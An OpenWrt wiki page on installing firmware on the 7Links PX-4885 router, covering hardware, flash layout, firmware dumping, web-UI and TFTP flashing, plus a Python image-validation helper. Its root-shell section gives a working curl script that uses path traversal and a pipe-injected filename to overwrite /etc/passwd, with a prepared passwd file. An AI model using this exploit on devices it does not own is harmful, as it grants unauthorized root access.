
7Links PX-4885

A small battery-powered wireless router.

Hardware Highlights

SoC           | RAM    | Flash | Wireless | Ethernet  | USB      | Serial         | JTAG
--------------|--------|-------|----------|-----------|----------|----------------|-----
RaLink RT5350 | 32 MiB | 4 MiB | 11b/g/n  | 1 Gigabit | 1 USB2.0 | Yes (untested) | ?

Product page on manufacturer's website (DE)

Downloads section (GPL source code) (DE)

NOTE: The GPL tarball provided by the manufacturer contains the Ralink SDK but not all the required software and assets to build the stock firmware image.

Installation

Flash Layout

Base address | Size     | OpenWrt name | Purpose
-------------|----------|--------------|--------
0x000000     | 0x020000 | u-boot       | The bootloader.
0x020000     | 0x020000 | devdata      | Stock firmware configuration. Unused in OpenWrt.
0x040000     | 0x010000 | devconf      | Contains WiFi calibration and MAC addresses.
0x050000     | 0x3b0000 | firmware     | The firmware itself.

Dumping the stock firmware

If you want to be able to switch back to the stock firmware, you need to dump it before installing OpenWrt, as the manufacturer doesn't provide a firmware image.

Obtaining a root shell

The stock firmware has a telnet daemon running. However, in order to drop to a root shell, it requires authenticating as user hongxun with a default password I couldn't figure out.

Luckily, a flaw in the web UI allows us to overwrite the /etc/passwd file with one we provide and get a root shell.

Here are the steps to follow:

  1. Reset the web UI username and password to admin/admin.
  2. Prepare a FAT- or NTFS-formatted USB stick. Avoid using a multi-card reader for that, since it may cause part of the firmware to crash.
  3. Create the files set_telnet_passwd.sh and passwd according to the two frames below. Save them in the same directory. Make sure set_telnet_passwd.sh has executable permission.
  4. Plug the USB stick into the router's USB port and wait 5 seconds after the blue LED blinks 5 times. This is necessary for a successful exploit of the flaw.
  5. Open a shell in the directory where you just created the files and run the set_telnet_passwd.sh script. It should exit with a message like: curl: (52) Empty reply from server.
  6. If it succeeded, you should now be able to telnet to the router and get a root shell using username admin and password admin.
set_telnet_passwd.sh

#!/bin/sh
ROUTER_IP=${1:-192.168.169.1}
# Set the current directory.
curl "http://admin:admin@${ROUTER_IP}/wireless/yun.asp?/media/../etc?946685196" > /dev/null
# Remove the old passwd file.
curl -d "n/a" "http://${ROUTER_IP}/goform/upload_file_set?action=del_files&filenames=passwd|"
# And replace it with the patched one.
curl -F "file=@passwd;filename=passwd" "http://${ROUTER_IP}/cgi-bin/upload_file.cgi" > /dev/null

passwd

hongxun:ydh7SLkuJO1zE:0:0:Adminstrator:/:/bin/sh
admin:8hES/Pe0q4.Q2:0:0:Adminstrator:/:/bin/sh

Performing the actual firmware dump

Your USB media will likely be automounted as /media/sda1, so you should be able to dump a full flash image with the command:

cat /dev/mtd0ro > /media/sda1/px4885_stock_full_dump.img

The resulting file will contain a full image of the flash, with all the partitions.

If you want a firmware image directly flashable with sysupgrade or TFTP, run the command:

cat /dev/mtd6ro > /media/sda1/px4885_stock_firmware.img

IMPORTANT: Before unplugging the USB stick or switching the router off, run the umount /media/sda1 command to make sure all data was committed to disk.

Flashing using the stock firmware web UI (easiest method)

The web UI of the stock firmware can be used to flash an OpenWrt image. However, it will only accept an image with an initramfs root filesystem. So if you want your configuration to survive reboots, you'll need to flash your device twice:

  • Flash an initramfs OpenWrt image using the web UI of the stock firmware.
  • Now that the device runs OpenWrt, perform a sysupgrade with a squashfs OpenWrt image. See generic.sysupgrade.

Flashing using TFTP

Another way to flash your device is to put the bootloader in TFTP flashing mode. To enter this mode, use a thin object (a needle, for instance) to press the push button inside the small hole in the corner to the right of the Ethernet port, and power on the device. If the bootloader successfully entered TFTP flashing mode, the LED should be steady blue. As the button is not aligned with the axis of the hole, it can prove difficult to hold it pressed while moving the power switch at the same time.

In TFTP flashing mode, the bootloader sends TFTP requests on its Ethernet interface. It keeps trying until it succeeds in downloading the firmware image.

Note: The bootloader does not check the validity of the downloaded firmware image. However, even if you feed it an image that won't boot, you should still be able to restart the device in TFTP flashing mode, as the bootloader partition is left untouched.

Here is the information you need to set up a TFTP server and your network interface.

TFTP server (your machine) IP address | 10.10.10.3
Firmware TFTP image                   | Kernal.bin
TFTP client (device) IP address       | 10.10.10.123

The Kernal.bin file fetched by the device from your TFTP server is written directly into the firmware partition. It can be any valid U-Boot image, and it obviously cannot be bigger than the firmware partition (about 3.6 MiB).
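Two sanity checks worth running around the dump and TFTP procedures above, as an added Python example that is not part of this wiki page or of OpenWrt: carving the firmware partition out of a full /dev/mtd0ro dump using the flash layout table, and verifying that a file you are about to serve as Kernal.bin is a well-formed U-Boot legacy image (magic, header CRC, data CRC) that fits the 0x3b0000-byte firmware partition, since the bootloader itself validates nothing. It assumes the firmware partition begins with a U-Boot legacy (uImage) header; the sample dump and image are constructed in the code, not taken from a device.

```python
import struct
import zlib

FLASH_LAYOUT = [                        # (OpenWrt name, base, size) from the flash layout table
    ("u-boot",   0x000000, 0x020000),
    ("devdata",  0x020000, 0x020000),
    ("devconf",  0x040000, 0x010000),
    ("firmware", 0x050000, 0x3b0000),
]
FLASH_SIZE = 4 * 1024 * 1024            # the 4 MiB flash chip, as dumped from /dev/mtd0ro
UIMAGE_MAGIC = 0x27051956               # U-Boot legacy image ("uImage") magic
UIMAGE_HDR = struct.Struct(">7I4B32s")  # 64-byte big-endian legacy header

def carve(full_dump: bytes, name: str) -> bytes:
    """Cut one partition out of a full-flash dump using the layout table."""
    if len(full_dump) != FLASH_SIZE:
        raise ValueError(f"dump is {len(full_dump):#x} bytes, expected {FLASH_SIZE:#x}")
    base, size = next((b, s) for n, b, s in FLASH_LAYOUT if n == name)
    return full_dump[base:base + size]

def check_uimage(image: bytes, max_size: int = 0x3b0000) -> dict:
    """Validate magic, header CRC, data CRC, and that the image fits the firmware partition."""
    if len(image) < UIMAGE_HDR.size:
        raise ValueError("too short for a U-Boot header")
    hdr = image[:UIMAGE_HDR.size]
    magic, hcrc, _t, dsize, _load, _ep, dcrc, _os, _arch, _type, _comp, name = UIMAGE_HDR.unpack(hdr)
    if magic != UIMAGE_MAGIC:
        raise ValueError(f"bad magic {magic:#010x}")
    if zlib.crc32(hdr[:4] + b"\0\0\0\0" + hdr[8:]) != hcrc:  # header CRC is taken with hcrc zeroed
        raise ValueError("header CRC mismatch")
    data = image[UIMAGE_HDR.size:UIMAGE_HDR.size + dsize]
    if len(data) != dsize or zlib.crc32(data) != dcrc:
        raise ValueError("payload truncated or data CRC mismatch")
    if UIMAGE_HDR.size + dsize > max_size:
        raise ValueError(f"image needs {UIMAGE_HDR.size + dsize:#x} bytes, partition holds {max_size:#x}")
    return {"name": name.rstrip(b"\0").decode(), "size": UIMAGE_HDR.size + dsize}

def make_uimage(payload: bytes, name: bytes = b"constructed test image") -> bytes:
    """Build a minimal legacy uImage: a constructed stand-in for a real Kernal.bin."""
    f = [UIMAGE_MAGIC, 0, 0, len(payload), 0x80000000, 0x80000000,
         zlib.crc32(payload), 5, 5, 2, 0, name.ljust(32, b"\0")]  # os=Linux, arch=MIPS, type=kernel
    f[1] = zlib.crc32(UIMAGE_HDR.pack(*f))                     # fill in the header CRC
    return UIMAGE_HDR.pack(*f) + payload

def sample_full_dump() -> bytes:
    """Constructed full-flash image: erased (0xff) flash with a uImage at the firmware base."""
    dump = bytearray(b"\xff" * FLASH_SIZE)
    fw = make_uimage(b"kernel+rootfs placeholder " * 64)
    dump[0x050000:0x050000 + len(fw)] = fw
    return bytes(dump)
```

On real files, check_uimage(open("Kernal.bin", "rb").read()) vets an image before serving it, and check_uimage(carve(open("px4885_stock_full_dump.img", "rb").read(), "firmware")) vets a stock dump; the carved slice should also match a px4885_stock_firmware.img taken from /dev/mtd6ro.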

The flashing process may take a couple of minutes.

Once the bootloader has flashed the firmware, it will immediately attempt to boot it (the LED will turn orange).

Upgrading OpenWrt

Basic configuration

Basic configuration: after flashing, proceed with this. Set up your Internet connection, configure wireless, configure the USB port, etc.

Failsafe mode

Hardware

Buttons

See hardware.button on how to use and configure the hardware button(s).

The PX-4885 only has one software-accessible hardware button, which is the hidden reset button. The battery button used to check the battery level is not hooked to any GPIO so it cannot be repurposed in software.

BUTTON | Event
-------|------
Reset  | reset

Serial

See port.serial for general information about the serial port, serial port cable, etc.

This device seems to have UART pins accessible through test pads on the board. I didn't test that, though.

JTAG

See port.jtag for general information about the JTAG port, JTAG cable, etc.

Debricking

See generic.debrick.

If you didn't erase your bootloader partition, you should still be able to boot into TFTP flashing mode and flash a new firmware image using this method.

Notes

The stock firmware claims to have only 16 MiB RAM while the RAM chip is actually a 32 MiB one. OpenWrt reports the RAM size correctly and can use the full 32 MiB of RAM. What a pleasant surprise!

toh/7links/px4885.txt · Last modified: 2014/06/06 01:11 by bonstra